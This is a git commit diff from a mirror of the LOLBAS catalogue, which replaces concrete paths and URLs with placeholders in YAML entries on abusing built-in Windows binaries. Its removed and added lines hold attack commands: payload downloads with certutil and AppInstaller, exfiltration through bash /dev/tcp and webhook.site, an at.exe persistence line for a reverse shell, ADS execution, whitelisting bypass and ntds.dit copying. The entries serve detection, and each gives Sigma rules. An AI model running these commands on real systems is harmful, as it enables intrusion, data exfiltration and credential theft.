public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-30 15:23:07 +01:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze 2025-01-28 11:15:01 +00:00 committed by GitHub
parent e62749f81a
commit a79893e7ad
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
196 changed files with 555 additions and 758 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/AppInstaller.yml
View File

@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: 'Wade Hickey'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
- Command: start ms-appinstaller://?source={REMOTEURL:.exe}
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet
Category: Download

2
yml/OSBinaries/At.yml
View File

@ -4,7 +4,7 @@ Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith'
Created: 2019-09-20
Commands:
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
Description: Create a recurring task to execute every day at a specific time.
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
Category: Execute

2
yml/OSBinaries/Atbroker.yml
View File

@ -1,7 +1,7 @@
---
Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware

14
yml/OSBinaries/Bash.yml
View File

@ -1,11 +1,11 @@
---
Name: Bash.exe
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
- Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
@ -31,8 +31,8 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
@ -43,8 +43,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml

2
yml/OSBinaries/Bitsadmin.yml
View File

@ -1,7 +1,7 @@
---
Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

4
yml/OSBinaries/Certoc.yml
View File

@ -4,7 +4,7 @@ Description: Used for installing certificates
Author: 'Ensar Samil'
Created: 2021-10-07
Commands:
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
- Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
Description: Loads the target DLL file
Usecase: Execute code within DLL file
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
- Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.
Category: Download

12
yml/OSBinaries/Certreq.yml
View File

@ -1,18 +1,18 @@
---
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: 'David Middlehurst'
Author: David Middlehurst
Created: 2020-07-07
Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
Usecase: Upload
Category: Upload
Privileges: User
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
- IOC: certreq creates new files

22
yml/OSBinaries/Certutil.yml
View File

@ -1,46 +1,46 @@
---
Name: Certutil.exe
Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save executable to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save executable to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -encode inputFileName encodedOutputFileName
- Command: certutil -encode {PATH} {PATH:.base64}
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decode encodedInputFileName decodedOutputFileName
- Command: certutil -decode {PATH:.base64} {PATH}
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
- Command: certutil -decodehex {PATH:.hex} {PATH}
Description: Command to decode a hexadecimal-encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
@ -49,8 +49,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

8
yml/OSBinaries/Cmd.yml
View File

@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
Author: Ye Yint Min Thu Htut
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
Description: Add content to an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe - < fakefile.doc:payload.bat
- Command: cmd.exe - < {PATH}:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1059.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
- Command: type {PATH_SMB} > {PATH_ABSOLUTE}
Description: Downloads a specified file from a WebDAV server to the target file.
Usecase: Download/copy a file from a WebDAV server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
- Command: type {PATH_ABSOLUTE} > {PATH_SMB}
Description: Uploads a specified file to a WebDAV server.
Usecase: Upload a file to a WebDAV server
Category: Upload

2
yml/OSBinaries/Cmdkey.yml
View File

@ -1,7 +1,7 @@
---
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cmdkey /list

2
yml/OSBinaries/Cmdl32.yml
View File

@ -1,7 +1,7 @@
---
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-26
Commands:
- Command: cmdl32 /vpn /lan %cd%\config

6
yml/OSBinaries/Cmstp.yml
View File

@ -1,10 +1,10 @@
---
Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
- Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
- Command: cmstp.exe /ni /s {REMOTEURL:.inf}
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AWL Bypass

4
yml/OSBinaries/Colorcpl.yml
View File

@ -1,10 +1,10 @@
---
Name: Colorcpl.exe
Description: Binary that handles color management
Author: 'Arjan Onwezen'
Author: Arjan Onwezen
Created: 2023-06-26
Commands:
- Command: colorcpl file.txt
- Command: colorcpl {PATH}
Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\.
Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment.
Category: Copy

8
yml/OSBinaries/ConfigSecurityPolicy.yml
View File

@ -1,17 +1,17 @@
---
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
- Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
Privileges: User
MitreID: T1567
OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload
- Command: ConfigSecurityPolicy.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
- IOC: ConfigSecurityPolicy storing data into alternate data streams.

8
yml/OSBinaries/Conhost.yml
View File

@ -4,8 +4,8 @@ Description: Console Window host
Author: Wietze Beukema
Created: 2022-04-05
Commands:
- Command: "conhost.exe calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
- Command: conhost.exe {CMD}
Description: Execute a command line with conhost.exe as parent process
Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
- Command: conhost.exe --headless {CMD}
Description: Execute a command line with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
Category: Execute
Privileges: User

8
yml/OSBinaries/Control.yml
View File

@ -1,10 +1,10 @@
---
Name: Control.exe
Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
- Command: control.exe {PATH_ABSOLUTE}:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
- Command: control.exe {PATH_ABSOLUTE:.cpl}
Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User

12
yml/OSBinaries/Csc.yml
View File

@ -1,18 +1,18 @@
---
Name: Csc.exe
Description: Binary file used by .NET Framework to compile C# code
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: csc.exe -out:Output.exe File.cs
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
- Command: csc.exe -out:{PATH:.exe} {PATH:.cs}
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: csc -target:library File.cs
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
- Command: csc -target:library {PATH:.cs}
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -25,8 +25,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml

4
yml/OSBinaries/Cscript.yml
View File

@ -1,10 +1,10 @@
---
Name: Cscript.exe
Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS

2
yml/OSBinaries/CustomShellHost.yml
View File

@ -1,7 +1,7 @@
---
Name: CustomShellHost.exe
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: 'Wietze Beukema'
Author: Wietze Beukema
Created: 2021-11-14
Commands:
- Command: CustomShellHost.exe

4
yml/OSBinaries/DataSvcUtil.yml
View File

@ -1,10 +1,10 @@
---
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: 'Ialle Teixeira'
Author: Ialle Teixeira
Created: 2020-12-01
Commands:
- Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
- Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload

4
yml/OSBinaries/Desktopimgdownldr.yml
View File

@ -4,7 +4,7 @@ Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 2020-06-28
Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen
Usecase: Download arbitrary files from a web server
Category: Download
@ -13,8 +13,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\desktopimgdownldr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml

4
yml/OSBinaries/DeviceCredentialDeployment.yml
View File

@ -1,8 +1,8 @@
---
Name: DeviceCredentialDeployment.exe
Description: Device Credential Deployment
Author: 'Elliot Killick'
Created: '2021-08-16'
Author: Elliot Killick
Created: 2021-08-16
Commands:
- Command: DeviceCredentialDeployment
Description: Grab the console window handle and set it to hidden

6
yml/OSBinaries/Dfsvc.yml
View File

@ -1,10 +1,10 @@
---
Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL Bypass
@ -19,8 +19,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:

12
yml/OSBinaries/Diantz.yml
View File

@ -4,8 +4,8 @@ Description: Binary that package existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Created: 2020-08-08
Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
- Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an Alternate Data Stream.
Category: ADS
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine.
- Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
Description: Download and compress a remote file and store it in a CAB file on local machine.
Usecase: Download and compress into a cab file.
Category: Download
Privileges: User
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
- Command: diantz /f directives.ddf
- Command: diantz /f {PATH:.ddf}
Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
Usecase: Bypass command-line based detections
Category: Execute
@ -34,8 +34,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml

8
yml/OSBinaries/Diskshadow.yml
View File

@ -1,10 +1,10 @@
---
Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
- Command: diskshadow.exe /s {PATH:.txt}
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
Category: Dump
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe
- Command: diskshadow> exec {PATH:.exe}
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml

5
yml/OSBinaries/Dnscmd.yml
View File

@ -1,10 +1,10 @@
---
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
Usecase: Remotely inject dll to dns server
Category: Execute
@ -28,7 +28,6 @@ Resources:
- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement:
- Person: Shay Ber
Handle:
- Person: Dimitrios Slamaris
Handle: '@dim0x69'
- Person: Nikhil SamratAshok

16
yml/OSBinaries/Esentutl.yml
View File

@ -1,45 +1,45 @@
---
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
- Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
Description: Copies the source VBS file to the destination VBS file.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
- Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
- Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
- Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
- Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o
Description: Copies the source EXE to the destination EXE file
Usecase: Use to copy files from one unc path to another
Category: Download
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}
Description: Copies a (locked) file using Volume Shadow Copy
Usecase: Copy/extract a locked file such as the AD Database
Category: Copy
@ -49,8 +49,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml

4
yml/OSBinaries/Eventvwr.yml
View File

@ -1,7 +1,7 @@
---
Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek'
Author: Jacob Gajek
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
